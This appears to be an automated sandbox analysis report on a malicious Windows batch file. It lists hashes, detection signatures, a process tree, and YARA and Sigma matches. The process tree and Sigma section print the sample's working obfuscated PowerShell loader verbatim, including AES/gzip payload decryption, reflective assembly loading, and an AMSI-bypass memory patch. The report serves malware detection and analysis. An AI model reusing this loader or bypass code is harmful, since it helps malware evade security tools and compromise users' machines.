Edit tour

Windows Analysis Report
1 (2).cmd

Overview

General Information

Sample name:	1 (2).cmd
Analysis ID:	1524984
MD5:	64d17cf4e56c0fdc93365eb17914ce39
SHA1:	4861be8ba1ba6d567f9950390f290bb8b860ccae
SHA256:	7a83a44720d94be24a8e7745d6871d65afda849c4008ab72511dd5ac38c7378c
Tags:	azure-winsecure-comcmduser-JAMESWT_MHT
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

.NET source code contains process injector

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious names

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs a global keyboard hook

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Obfuscated command line found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sets debug register (to hijack the execution of another thread)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential WinAPI Calls Via CommandLine

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powerup Write Hijack DLL

Suspicious command line found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7480 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1 (2).cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7532 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 7552 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 7624 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 7632 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 7708 cmdline: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7720 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

WerFault.exe (PID: 7940 cmdline: C:\Windows\system32\WerFault.exe -u -p 7720 -s 2392 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cmd.exe (PID: 752 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6052 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 3228 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 1308 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2056 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 2332 cmdline: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 2080 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 2300 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 4052 cmdline: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[0])));'.Replace('blck', '');Invoke-Expression '$gCnqy=YVagc (PNNxp (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($eWOHt[1])));'.Replace('blck', '');bKLzO $fHjin (,[string[]] (''));bKLzO $gCnqy (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 7080 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

WerFault.exe (PID: 4300 cmdline: C:\Windows\system32\WerFault.exe -u -p 7080 -s 2400 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 4536 cmdline: C:\Windows\system32\WerFault.exe -u -p 7080 -s 2172 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

schtasks.exe (PID: 4788 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 4940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7580 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7972 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 1484 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aYWZgkdITfai{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$fJPxTSrGmUkcyL,[Parameter(Position=1)][Type]$DKfBMaOKCb)$QUflgQKJgBw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('M'+[Char](121)+'De'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'a'+[Char](108)+'e'+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QUflgQKJgBw.DefineConstructor(''+[Char](82)+'T'+'S'+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$fJPxTSrGmUkcyL).SetImplementationFlags(''+'R'+'u'+'n'+''+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$QUflgQKJgBw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$DKfBMaOKCb,$fJPxTSrGmUkcyL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'m'+[Char](101)+''+','+''+'M'+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+'d');Write-Output $QUflgQKJgBw.CreateType();}$WRnqVVFrVLSrh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+'.'+'W'+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+'ns'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+''+[Char](101)+'Me'+'t'+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$YLRtgUHBybAeSz=$WRnqVVFrVLSrh.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PEmsRMlCSlPDgPcGUWk=aYWZgkdITfai @([String])([IntPtr]);$okFleUAeyDuwZAfHWQFfNP=aYWZgkdITfai @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$aBWxSgKrnUs=$WRnqVVFrVLSrh.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$WzFkwARTzpFLOf=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$aBWxSgKrnUs,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+'bra'+[Char](114)+'yA')));$qdgplTDpiNjVfetqy=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$aBWxSgKrnUs,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$WxFISlG=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WzFkwARTzpFLOf,$PEmsRMlCSlPDgPcGUWk).Invoke('a'+'m'+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$BtHEHTUmMhFSXEmPh=$YLRtgUHBybAeSz.Invoke($Null,@([Object]$WxFISlG,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+'n'+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$xiihgyajRQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdgplTDpiNjVfetqy,$okFleUAeyDuwZAfHWQFfNP).Invoke($BtHEHTUmMhFSXEmPh,[uint32]8,4,[ref]$xiihgyajRQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BtHEHTUmMhFSXEmPh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qdgplTDpiNjVfetqy,$okFleUAeyDuwZAfHWQFfNP).Invoke($BtHEHTUmMhFSXEmPh,[uint32]8,0x20,[ref]$xiihgyajRQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](114)+''+[Char](98)+'x-s'+'t'+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dllhost.exe (PID: 2384 cmdline: C:\Windows\System32\dllhost.exe /Processid:{efb95082-f278-4e03-9e3f-6389e31f9866} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 372 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 888 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 660 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1200 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1224 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1352 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1392 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1404 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1412 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1596 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 7720	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x4c0d4d:$b2: ::FromBase64String( 0x4c0dab:$b2: ::FromBase64String( 0x53da02:$b2: ::FromBase64String( 0x53ee34:$b2: ::FromBase64String( 0x536b0:$s1: -join 0x58359:$s1: -join 0x43f2a1:$s1: -join 0x44c376:$s1: -join 0x44f748:$s1: -join 0x44fdfa:$s1: -join 0x4518eb:$s1: -join 0x453af1:$s1: -join 0x454318:$s1: -join 0x454b88:$s1: -join 0x4552c3:$s1: -join 0x4552f5:$s1: -join 0x45533d:$s1: -join 0x45535c:$s1: -join 0x455bac:$s1: -join 0x455d28:$s1: -join 0x455da0:$s1: -join

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function PNNxp($qgBgH){ $eOCgk=[System.Security.Cryptography.Aes]::Create(); $eOCgk.Mode=[System.Security.Cryptography.CipherMode]::CBC; $eOCgk.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $eOCgk.Key=[System.Convert]::FromBase64String('Y9z5o9CK+DHYcwqkzoy/iWEpX+O8Iv9A3DgJbXPgJZk='); $eOCgk.IV=[System.Convert]::FromBase64String('6XSbRvuRO9XQg710dEY/2A=='); $HrolG=$eOCgk.CreateDecryptor(); $IcZIb=$HrolG.TransformFinalBlock($qgBgH, 0, $qgBgH.Length); $HrolG.Dispose(); $eOCgk.Dispose(); $IcZIb;}function YVagc($qgBgH){ Invoke-Expression '$KSWxg=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$qgBgH);'.Replace('blck', ''); Invoke-Expression '$QmRKw=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IvNNq=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($KSWxg, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IvNNq.CopyTo($QmRKw); $IvNNq.Dispose(); $KSWxg.Dispose(); $QmRKw.Dispose(); $QmRKw.ToArray();}function bKLzO($qgBgH,$HpAZd){ Invoke-Expression '$Koibj=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$qgBgH);'.Replace('blck', ''); Invoke-Expression '$eMXWr=$Koibj.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$eMXWr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $HpAZd)blck;'.Replace('blck', '');}$DgVFr = 'C:\Users\user\Desktop\1 (2).cmd';$host.UI.RawUI.WindowTitle = $DgVFr;$BZwPR=[System.IO.File]::ReadAllText($DgVFr).Split([Environment]::NewLine);foreach ($BpbHj in $BZwPR) { if ($BpbHj.StartsWith(':: ')) { $syTFV=$BpbHj.Substring(3); break; }}$eWOHt=[string[]]$syTFV.Split('\');Invoke-Expression '$fHjin=YVagc (PNNxp 